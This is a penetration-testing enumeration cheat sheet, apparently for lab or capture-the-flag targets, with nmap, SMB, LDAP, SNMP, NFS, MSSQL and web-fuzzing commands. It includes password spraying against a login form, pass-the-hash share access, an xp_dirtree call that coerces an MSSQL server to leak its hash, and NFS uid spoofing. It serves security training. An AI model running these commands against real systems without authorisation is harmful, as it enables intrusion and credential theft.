Tools-Enumeration


Enumeration


Host Discovery

Portscanner – NMAP:
##To save time, first run a simple SYN scan (half-open) over all ports to find the open ones. Then run a thorough scan with -sC -sV against only those ports, passing the list of open ports to -p.
> nmap 10.10.10.10 -p- -T4 -oA allports
> nmap 10.10.10.10 -p22,80,445 -sC -sV  -T4 -oA fullscan
> nmap 10.10.10.10 -sU -oA udpscan

##Grab all ports out of a -p- Nmap scan and write them to a file called ports
##Print them on one line so they can be pasted into -p for the thorough scan
> cat allports.nmap | grep ^[0-9] | awk -F/ '{print $1}' | sort -u > ports
> for i in $(cat ports); do echo -n $i,; done
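The same port extraction as a reusable POSIX shell function, added here as an example that is not part of the original cheat sheet: it keeps only ports in state open from an allports.nmap-style file (the sample output below is constructed, not a real scan) and prints them as the comma-separated list -p expects, without the trailing comma the one-liner above leaves behind.

```sh
# Added example (not from the original cheat sheet): extract only the ports in
# state "open" from nmap normal output (-oN / -oA *.nmap) and print them as the
# comma-separated -p argument. "filtered", "closed" and "open|filtered" lines
# are skipped.

# Constructed sample of a -oA allports.nmap output (not a real scan).
SAMPLE_NMAP='# Nmap 7.94 scan initiated as: nmap 10.10.10.10 -p- -T4 -oA allports
Nmap scan report for 10.10.10.10
Host is up (0.020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
135/tcp  filtered msrpc
445/tcp  open     microsoft-ds
8080/tcp open     http-proxy
# Nmap done -- 1 IP address (1 host up) scanned'

# open_ports: reads nmap normal output on stdin, prints e.g. "22,80,445,8080"
open_ports() {
    # keep "<port>/tcp|udp   open " lines and take the number before the slash
    awk -F/ '/^[0-9]+\/(tcp|udp)[ \t]+open[ \t]/ { print $1 }' \
        | sort -nu \
        | paste -s -d ',' -
}

# Demo on the constructed sample; in practice: open_ports < allports.nmap
printf '%s\n' "$SAMPLE_NMAP" | open_ports
```

The result can be fed straight into the thorough scan, e.g. `nmap 10.10.10.10 -p "$(open_ports < allports.nmap)" -sC -sV -T4 -oA fullscan`.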


Screenshot websites:

##For quicker enumeration on large networks, take a screenshot of every web server to quickly find the juicy stuff (LINK).
> cat hosts.txt | aquatone
> firefox aquatone_report.html

Enumerate Users over RPC:
## For Windows use Impacket's lookupsid.py (LINK)
> python3 lookupsid.py 'username:password'@10.10.10.10
##Or use rpcclient
> rpcclient 'username%password' 10.10.10.10
##From here, press Tab to list all commands
rpcclient $> lookupnames administrator
##Look up SIDs. Replace XXXX with a RID >= 500 for administrative accounts or >= 1000 for normal user accounts
rpcclient $> lookupsids S-1-5-*****-XXXX
## For Linux use enum4linux
## enum4linux works against Windows as well
> enum4linux -a 10.10.10.10


Services

21 – FTP

Use find on FTP:
##The default ftp client does not support a "find" command. Use lftp instead and run find inside the lftp shell.
> lftp user@host
lftp> find . | grep "config"

Display hidden directories & files with lftp:
##Add the following line to /etc/lftp.conf
> vim /etc/lftp.conf
set ftp:list-options -a

53 – DNS

DNS zone transfer:
> dig axfr @10.10.10.10 dns.zone

80, 443 – HTTP / HTTPS

Find Hidden Directories:
##Gobuster appends every wordlist entry to the end of the -u value. To brute-force a directory other than the web root, e.g. /admin/, pass -u http://10.10.10.10:8080/admin/
> gobuster -u http://10.10.10.10:8080/ -w wordlists.txt [-s statuscodes]
##wfuzz fuzzes the part of the URL where it finds "FUZZ" inside the -u value. With the --hX parameters you hide responses: --hc by status code, --hl by line count, --hw by word count, --hh by character count. For example --hh 123 hides all responses with a length of 123 characters.
> wfuzz -u http://10.10.10.10:8080/admin/FUZZ -w /wordlists/list.txt [--hc/--hl/--hw/--hh N]

Live-Login Dictionary attack (password spraying):
##Use Burp to intercept one login attempt to get the content for the POST data (-d); use --hw with the word count of a failed login to hide those responses
> wfuzz -c --hw 42 -w wordlist.txt -d 'username=admin&password=FUZZ&submit=login' http://10.10.10.10/login

Web server vulnerability scanner:
> nikto -host http://10.10.10.10:8080/

Specific WebApp-Scanners:
> wpscan --url http://10.10.10.10/wordpress-root-directory
> joomscan -u http://10.10.10.10/joomla


161 UDP – SNMP

Get Community String via dictionary:
##You can find a link to download SecLists in the "Helpful Links" section.
> onesixtyone -c /SecLists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.10

Read out SNMP-Data:
##-c is the community string, which is most likely "public". Use -v1 or -v2c depending on the SNMP version. To get readable OID names in the output, run "apt install snmp-mibs-downloader" and comment out the "mibs :" line in /etc/snmp/snmp.conf
> snmpwalk -c public -v2c 10.10.10.92


139 / 445 – SMB

List SMB-Shares and access a specific share:
> smbclient -L 10.10.10.10
> smbclient \\\\10.10.10.10\\share-name

Mount a SMB-share to any destination (e.g. /mnt):
##Make sure that destination is not already mounted – unmount first
## use empty password for mounting for null authentication
> umount /mnt
> mount -t cifs '//10.10.10.10/share name' /mnt


List all content of an SMB share unauthenticated:
##Use -d localhost or the actual domain, or leave it empty, depending on the error message
> smbmap -H 10.10.10.10 -u anonymous -d localhost


Connect to an SMB share via pass-the-hash and list all content:
> smbmap -u username -p 'NTLMHASH:NTLMHASH' -H 10.10.10.10 -R

Print all permissions after mounting; execute inside the mountpoint (inside /mnt for the previous example):
> for i in $(ls); do echo $i; smbcacls -N '//10.10.10.10/share name' $i; done


389 – LDAP

Pull information like Naming Context, Distinguished Names and Domain Components:
> nmap -p 389 --script ldap-rootdse -Pn 10.10.10.10
> nmap -p 389 --script ldap-search -Pn 10.10.10.10
> ldapsearch -x -h 10.10.10.10 -s base namingcontexts

With the naming context from the Nmap output above, use ldapsearch:
> ldapsearch -x -h 10.10.10.10 -s base -b 'dc=Nmap output,dc=Nmap output'
> ldapsearch -x -h 10.10.10.10 -s sub -b 'dc=Nmap output,dc=Nmap output'
> ldapsearch -x -h 10.10.10.10 -b 'dc=Nmap output,dc=Nmap output'

Pull data as an authenticated user:
## Pass the user's Distinguished Name with -D; -W prompts for the password
> ldapsearch -x -h 10.10.10.10 -D "CN=User,OU=..,DC=..,DC=…" -W


1433 MS-SQL

Connect to an MSSQL database via Impacket's mssqlclient.py (LINK):
> mssqlclient.py username@10.10.10.10 -windows-auth

From the mssqlclient.py shell, make the MSSQL server connect to an SMB share to capture its hash (Responder needs to be listening):
> xp_dirtree "\\10.10.10.10\offensiveShare\"


2049 – NFS Network File System

##Make sure to apt install nfs-common
> showmount -e 10.10.10.10
##Try NFS version 2 because it has no authentication: the client is responsible for authorization. When you get "permission denied", the client has to present the right uid. So check the uid of the files (ls -alh) and give one of your local users that uid.
> mount -t nfs -o vers=2 10.10.10.10:/sharename /mnt/point
##Example: ls -alh shows files in the share owned by uid 1002. Create a new local user ("useradd offensive") and edit that user's uid in /etc/passwd to offensive:x:1002:2004::/home/offensive:/bin/sh


3000 – Node.js

##Try to authenticate against Node.js using HTTP basic authentication
> curl http://username:password@10.10.10.10:3000/login

##Try to authenticate against Node.js with a POST form (the correct parameter names might have to be guessed)
> curl -XPOST http://10.10.10.10:3000/login -d 'user=admin&password=admin'
> curl -XPOST http://10.10.10.10:3000/login -d 'username=admin&password=admin'

##Decode the token you get back to extract information, e.g. if it is a JWT
##Send the token in a header (depends on the token type; Bearer for a JWT here)
> curl http://10.10.10.10:3000/ -H 'Authorization: Bearer insert_token_here'
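Decoding a JWT locally, as an added example that is not part of the original cheat sheet: JWT segments are base64url without padding, so a plain base64 -d fails on them until the alphabet is mapped back and the padding restored. The token below is constructed inside the script (fake signature); the helper names are my own.

```sh
# Added example (not from the original cheat sheet): decode the header and
# payload of a JWT to inspect its claims (alg, sub, exp, ...). The '-'/'_'
# characters are mapped back to '+'/'/' and '=' padding is restored before
# base64 -d. The signature segment is only carried along, never verified here.

# base64url-encode stdin (used only to build the constructed sample token)
b64url() {
    base64 | tr -d '\n=' | tr '/+' '_-'
}

# base64url-decode one token segment given as $1
b64url_decode() {
    seg=$(printf '%s' "$1" | tr '_-' '/+')
    case $(( ${#seg} % 4 )) in
        2) seg="${seg}==" ;;
        3) seg="${seg}=" ;;
    esac
    printf '%s' "$seg" | base64 -d
}

# jwt_part TOKEN N -> decoded segment N (1 = header, 2 = payload)
jwt_part() {
    b64url_decode "$(printf '%s' "$1" | cut -d. -f"$2")"
}

# Constructed sample token: realistic header and payload, fake signature.
HEADER='{"alg":"HS256","typ":"JWT"}'
PAYLOAD='{"sub":"admin","role":"user","exp":1700000000}'
SAMPLE_TOKEN="$(printf '%s' "$HEADER" | b64url).$(printf '%s' "$PAYLOAD" | b64url).fakesignature"

echo "header : $(jwt_part "$SAMPLE_TOKEN" 1)"
echo "payload: $(jwt_part "$SAMPLE_TOKEN" 2)"
```

For a real token, run `jwt_part "$TOKEN" 2` on the value returned by the login and check alg and exp before relying on anything else in it.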